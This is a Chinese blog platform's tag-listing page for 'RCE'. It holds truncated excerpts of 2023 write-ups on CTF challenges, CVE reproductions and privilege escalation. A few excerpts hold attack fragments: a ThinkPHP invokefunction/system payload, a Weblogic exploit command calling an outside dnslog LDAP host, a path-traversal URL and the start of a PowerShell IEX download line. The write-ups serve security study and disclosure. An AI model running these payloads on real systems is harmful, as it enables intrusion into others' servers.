rce

影响Windows 和 macOS平台,黑客利用 Adobe CF 漏洞部署恶意软件

远程攻击者可利用AdobeColdFusion2021中的验证前RCE漏洞,获取受影响系統的控制权力。Adobe已发布安全补丁来解决这些漏洞,但攻击者仍在利用这些漏洞。
FreeBuf_·2023-09-05 07:25

30 WEB漏洞-RCE代码及命令执行漏洞全解

目录前言代码执行命令执行代码执行函数(PHP)命令执行函数修复方法演示案例墨者靶场黑盒功能点命令执行-应用功能墨者靶场白盒代码及命令执行-代码分析墨者靶场黑盒层RCE漏洞检测-公开漏洞Javaweb-Struts2
山兔1·2023-09-05 06:36

NSSCTF web 刷题记录1

文章目录前言题目[GXYCTF2019]禁止套娃方法一方法二[NCTF2019]FakeXMLcookbook[NSSRound#7Team]ec_RCE[NCTF2018]FlaskPLUS前言今天是
Sx_zzz·2023-09-05 06:52

[羊城杯 2023] web

打开题目,可以判断这里为phpDevelopmentServer启动的服务查询得知,存在PHP$rce2=$this->exp[$rce2];}publicfunction__toString(){call_user_func
Sx_zzz·2023-09-05 06:17

nepctf2023 部分web复现

目录EZJAVA_CHECKIN(shiro550)独步天下-转生成为镜花水月中的王者(环境变量提权)独步天下-破除虚妄_探见真实(Venom代理&ping%0a绕过rce&c文件描述符未关闭连接父进程修改文件权限
葫芦娃42·2023-09-05 00:12

任意文件读取和漏洞复现

任意文件读取会造成(敏感)信息泄露:任意文件读取大多数情况是由于其他漏洞引发的,如RCE、目录遍历、文件包含等。任意文件读取与任意文件下载本质上没有区别,信总都是从服务瑞流向浏览器的。
网安咸鱼1517·2023-09-04 20:46

RCE 远程命令代码执行漏洞

什么是RECRemoteCommand/CodeExecute,远程命令或者代码执行。通过构造特殊的字符串,将数据提交到WEB应用程序,并利用该方式外部程序或命令进行攻击,类似SQL注入。Web应用程序使用了一些可以执行系统命令,或者代码的函数,由于对用户提交的数据过滤不严格,导致黑客可以利用服务器执行命令或者代码漏洞形成条件:可控变量,漏洞函数可控变量:可以控制的变量,就是通过url的传参,通过
DDosG·2023-09-04 18:48

Java-Sec-Code靶场

文章目录前言1.靶场搭建靶场地址、环境Window环境修改点靶场通关和源码分析命令注入RCE反序列化fastjson反序列化目录穿越文件上传Spel表达式sql注入poi-ooxml组件XXE总结前言一直都是一个
Aiwin-Hacker·2023-09-03 17:37

日志文件切换过程

[oswatch@rce1test]$cattest.confinput{file{path=>["/oswatch/test/test.log"]}}output{stdout{codec=>rubydebug
scan724·2023-09-03 13:41

[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

前言之前我在对一个目标进行测试的时候扫出了spring信息泄露,并利用heapdump查到了Redis的明文密码,以为到这就结束的时候,一个师傅给我说这个站可以rce,我一看,是被我忽略的扫出的第一个路径
00勇士王子·2023-09-03 09:28

ctfshow nodejs

-先知社区(aliyun.com)原型链污染深入理解JavaScriptPrototype污染攻击|离别歌(leavesongs.com)模板引擎rceXNUCA2019Hardjs题解从原型链污染到RCE
Ff.cheng·2023-09-03 06:09

RCE(远程命令执行)绕过总结

绕过四、通配符绕过正则1、可以通配得到的命令base64:bzip2:2、字符串通配五、变量拼接绕过正则六、内联执行七、“${}”截取环境变量拼接八、[]中括号匹配绕过九、source命令:十、无回显rce
Elitewa·2023-09-03 06:05

CVE-2023-21839 Weblogic未授权RCE

https://github.com/4ra1n/CVE-2023-21839下载之后生成CVE-2023-21389.exe先试试dnslog:CVE-2023-21839.exe-ip116.xx.xx.xx-port7001-ldapldap://whoami.eduvck.dnslog.cn/aa然后使用JNDIExploit-1.4-SNAPSHOT.jar进行攻击另一个终端上首先开启监
番茄酱料·2023-09-03 00:34

攻防世界-php_rce

原题解题思路thinkPHP.0有漏洞,ThinkPHP5.xrec漏洞分析与复现。本题就是利用漏洞查找。格式是:?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=命令。ls查看文件没什么东西,robots.txt和index.php有可能有,不过看了也没什么可疑的。一
mysmartwish·2023-09-02 11:45

【权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限

后台权限:SQL注入,数据库备份泄露,默认或弱口令等获取帐号密码进入网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell数据库权限:SQL注入,数据库备份泄露,默认或弱口令等进入或网站权限获取后转入接口权限
xiaoheizi安全·2023-09-02 08:12

Python、PHP和Java下的反序列化漏洞复现实例

python反序列化p83CTF夺旗Python考点SST&反序列化&字符串_正经人_____的博客-CSDN博客php反序列化p84CTF夺旗-PHP弱类型&异或取反&序列化&RCE_ctfphp异或
正经人_____·2023-09-01 22:03

WPS-RCE

版本:WPSOffice2023个人版<11.1.0.12313WPSOffice2019企业版<11.8.2.12085原理:Office中的WebExtension(通常称为Office插件或Office应用程序)是一种用于扩展MicrosoftOffice功能的技术。Office插件使第三方开发者能够在Office应用程序中集成自己的服务和功能。这些插件采用跨平台的Web技术(如HTML,C
奋斗的小智·2023-09-01 11:48

权限提升-PostgreSQL数据库提权+第三方应用提权

后台权限:SQL注入,数据库备份泄露,默认或弱口令等获取帐号密码进入网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell数据库权限:SQL注入,数据库备份泄露,默认或弱口令等进入或网站权限获取后转入接口权限
xiaoheizi安全·2023-09-01 06:57

权限提升-数据库提权-MSF-UDF提权

后台权限:SQL注入,数据库备份泄露,默认或弱口令等获取帐号密码进入网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell数据库权限:SQL注入,数据库备份泄露,默认或弱口令等进入或网站权限获取后转入接口权限
xiaoheizi安全·2023-09-01 06:53

任意文件读取和下载

过,任意文件读取会造成(敏感)信息泄露;任意文件读取大概率是由于其他漏洞引发的,如,RCE、目录遍历、文件包含等.任意文件读取与任意文件下载本质上没有区别,信息都是从服务端流向浏览器的。
EMT00923·2023-08-31 12:20

权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC

后台权限:SQL注入,数据库备份泄露,默认或弱口令等获取帐号密码进入网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell数据库权限:SQL注入,数据库备份泄露,默认或弱口令等进入或网站权限获取后转入接口权限
xiaoheizi安全·2023-08-31 11:25

【组件攻击链】一文看懂Spring全家桶各类RCE漏洞

image一、Spring全家桶简介Spring发展到现在,全家桶所包含的内容非常庞大,这里主要介绍其中关键的5个部分,分别是springframework、springboot、springcloud、springsecurity、springmvc。其中的springframework就是大家常常提到的spring,这是所有spring内容最基本的底层架构,其包含springmvc、sprin
H_00c8·2023-08-30 17:08

fastjson-1.2.24-rce(CVE-2017-18349)&fastjson-1.2.47-rce(CNVD-2019-22238)

一.fastjson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链影响范围:Fastjson1.2.24及之前版本环境:vulhub工具下载:marshalsec.jar1.生成class文件/
mushangqiujin·2023-08-30 00:09

CVE-2021-22986:BIG-IP/BIG-IQ未授权RCE

文章来源:TimelineSec0x01简介F5BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。0x02漏洞概述编号:CVE-2021-22986F5BIG-IP/BIG-IQiControlREST未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControlREST接口,构造恶意请求,执行任意系统命令。0x03影响版本F5BIG-IP1
华盟君·2023-08-29 05:41

安全开发-JS应用&NodeJS指南&原型链污染&Express框架&功能实现&审计&WebPack打包器&第三方库JQuery&安装使用&安全检测

文章内容环境搭建-NodeJS-解析安装&库安装安全问题-NodeJS-注入&RCE&原型链案例分析-NodeJS-CTF题目&源码审计打包器-WebPack-使用&安全第三方库-JQuery-使用&安全环境搭建
今天是 几 号·2023-08-28 20:12

权限提升-手工-系统权限提升

后台权限:SQL注入,数据库备份泄露,默认或弱口令等获取帐号密码进入网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell数据库权限:SQL注入,数据库备份泄露,默认或弱口令等进入或网站权限获取后转入接口权限
xiaoheizi安全·2023-08-28 07:20

WEB安全的总结学习与心得(十六)——代码执行漏洞

WEB安全的总结与心得(十六)01什么是代码执行漏洞代码执行漏洞的定义比较模糊,代码执行、文件包含、反序列化、命令执行,写文件getshell都属于RCE可以统称为RCE漏洞,即远程命令执行或远程代码执行
ultracool·2023-08-27 09:31

权限提升-数据库权限到web权限+后台权限到web权限

后台权限:SQL注入,数据库备份泄露,默认或弱口令等获取帐号密码进入网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell数据库权限:SQL注入,数据库备份泄露,默认或弱口令等进入或网站权限获取后转入接口权限
xiaoheizi安全·2023-08-26 23:46

[ctfshow web入门]常用姿势807-812

1NDEX0x00前言807反弹shellN种姿势808卡临时文件包含CVE-2018-14884穿插一个session.upload_progress809pear文件包含/RCE810SSRF打PHP-FPM811file_put_contents
k_du1t·2023-08-26 19:45

春秋云镜 :CVE-2020-21650(MyuCMS后台rce

一、题目靶标介绍:MyuCMS开源内容管理系统,采用ThinkPHP开发而成的社区商城聚合,插件,模板,轻便快捷容易扩展其2.2版本中admin.php/config/add方法存在任意命令执行漏洞.进入题目:exp:url/index.php/bbs/index/download?url=../../../../../flag&local=1&name查看flag:flag{2d3ea261-8
橙子学不会.·2023-08-25 20:08

CTFer成长之路-Web进阶之命令执行漏洞

在CTF中,命令执行一般发生在远程,故被称为远程命令执行,即RCE
余生似梦·2023-08-25 04:37

Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)

前言:Weblogic允许远程用户在未经授权的情况下通过IIOP/T3进行JNDIlookup操作,当JDK版本过低或本地存在javaSerializedData时,这可能会导致RCE漏洞。
安鸾彭于晏·2023-08-25 03:48

HVV爆火漏洞:最新 WPS RCE (远程命令执行) 复现

最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。0x00影响版本WPSOffice2023个人版<11.1.0.15120WPSOffice2019企业版<11.8.2.120850x01环境配置wps版本:WPSV11.1.0.12300靶机:windows10攻击机:ubuntu20.04IP:192.168.
安鸾彭于晏·2023-08-25 03:18

迪普防火墙命令行手册_Web应用程序防火墙(WAF)bypass技术讨论(一)

Web应用程序中发现RCE漏洞的情况还是挺常见的,2017OWASPTop10应用程序安全风险”也将“注入”置于第一位置,例如当解释器接收到用户可控的数据作为命令或查询来执行时,很有可能会导致注入风险,
weixin_39846378·2023-08-24 19:13

漏洞复现 || SXF应用交付系统RCE(0Day)

漏洞描述SXF应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令。免责声明技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于
丢了少年失了心1·2023-08-24 19:01

CVE-2021-26855:Exchange SSRF致RCE复现

image0x00简介ExchangeServer是微软公司的是一套电子邮件服务组件,是个消息与协作系统,主要提供包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理、实时会议和工作流等协作应用。0x01漏洞概述该漏洞是Exchange中的服务端请求伪造漏洞(SSRF),利用此漏洞的攻击者能够发送任意HTTP请求并绕过ExchangeServer身份验证,远程未授权的攻击者可以利用该漏洞以进
5f4120c4213b·2023-08-24 18:30

[赛博昆仑] 腾讯QQ_PC端,逻辑漏洞导致RCE漏洞

简介!!内容仅供学习,请不要进行非法网络活动,网络不是法外之地!!赛博昆仑是国内一家较为知名的网络安全公司,该公司今日报告称Windows版腾讯QQ桌面客户端出现高危安全漏洞,据称“黑客利用难度极低、危害较大”,腾讯刚刚已经紧急发布了9.7.15版本QQ,修复了该漏洞攻击者视角攻击者配置木马,这里使用powershell反弹会话模拟木马程序@echooffpowershellIEX(New-Obj
Мартин.·2023-08-24 09:26

ctf.show web 刷题记录

cerror我们要利用eval()函数命令执行,但是我们看一下if语句,发现是无字母数字RCE,并且不能用取反,异或,自增去绕过(这里可以参考p神文章)我们得先了解下面几个概念点.点命令等于sour
Sx_zzz·2023-08-23 20:11

亿赛通电子文档安全管理系统 RCE漏洞

亿赛通电子文档安全管理系统RCE漏洞一、产品简介二、漏洞概述三、复现环境四、漏洞复现小龙POC检测:五、修复建议免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失
安全攻防赵小龙·2023-08-22 10:55

锐捷某系统前台任意文件写入分析

文章转自作者瓜皮辰Part1前言这套系统我估计是全网第一个公开能拿shell的吧(不是的话当我没说),哪套系统自己猜,这次先分享下前台任意文件写入,还有几个rce日后分享,也感谢独立团孙德胜Alan提供的思路
土豆.exe·2023-08-22 05:33

锐捷EG易网关与NBR路由器命令执行漏洞-2

文章目录1、获取密码2、登陆后台RCE3、poc脚本前言:关于锐捷EG易网关与NBR路由器的命令执行漏洞1、获取密码poc:username=admin&password=pass?
1stPeak·2023-08-22 05:32

渗透和红队快速打点工具

POC-bomberPOCbomber是一款漏洞检测/利用工具,旨在利用大量高危害漏洞的POC/EXP快速获取目标服务器权限本项目收集互联网各种危害性大的RCE·任意文件上传·反序列化·sql注入等高危害且能够获取到服务器核心权限的漏洞
黑战士安全·2023-08-22 04:40

Ctfshow web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 持续更新中

Ctfshow命令执行web29pregmatch是正则匹配函数,匹配是否包含flag,if(!preg_match("/flag/i",$c)),/i忽略大小写可以利用system来间接执行系统命令flag采用f*绕过,或者mvfl?g.php1.txt修改文件名,或者cat反引号ls反引号linux通配符:https://www.cnblogs.com/ysuwangqiang/p/11364
Jay 17·2023-08-20 09:49

亿赛通电子文档安全管理系统 RCE漏洞复现

0x01产品简介亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机
OidBoy_G·2023-08-20 01:21

企望制造ERP系统 RCE漏洞复现

声明本文仅用于技术交流,请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。简介企望制造纸箱业erp系统由深知纸箱行业特点和业务流程的多位IT专家打造,将现代化的管理方式融入erp软件中,让企业分分钟就拥有科学的管理经验。本款erp系统适合用在纸箱厂、纸板厂、蜂窝、纸护角等企业中。漏洞概述由于企望制造ERPcombox
故事讲予风听·2023-08-19 23:13

CVE-2023-21839漏洞复现

漏洞原理CVE-2023-21839允许远程用户在未经授权的情况下通过IIOP/T3进行JNDIlookup操作,当JDK版本过低或本地存在小工具(javaSerializedData)时,这可能会导致RCE
小翠儿·2023-08-19 23:41

企望制造ERP系统 RCE漏洞[2023-HW]

企望制造ERP系统RCE漏洞一、产品简介二、漏洞概述三、复现环境四、漏洞复现小龙POC检测五、修复建议免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失
安全攻防赵小龙·2023-08-19 23:39

负载均衡下的webshell

主机对外ip和端口为192.168.100.130:18080我们假设其为一个真实的业务系统,存在一个rce漏洞,可以让我们获取webshell假设目标根目录下已经有了自己上传的木马文件ant.jsp2
undefineing·2023-08-19 08:24

【1day】复现金蝶OA 云星空 管理中心 kdsvc 远程命令执行漏洞

目录一、漏洞描述二、影响版本三、资产测绘四、漏洞复现一、漏洞描述金蝶OA云星空管理中心kdsvc存在远超命令执行漏洞,攻击者可通过远程命令执行RCE漏洞读取、修改、删除系统和应用程序中的敏感数据,如个人资料
xiaochuhe.·2023-08-19 04:23

近 2000 台 Citrix NetScaler 服务器遭到破坏

利用RCE入侵了6%的易受攻击服务器据悉,网络安全公司Fox-
FreeBuf_·2023-08-17 18:43
上一页 9 10 11 12 13 14 15 16 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他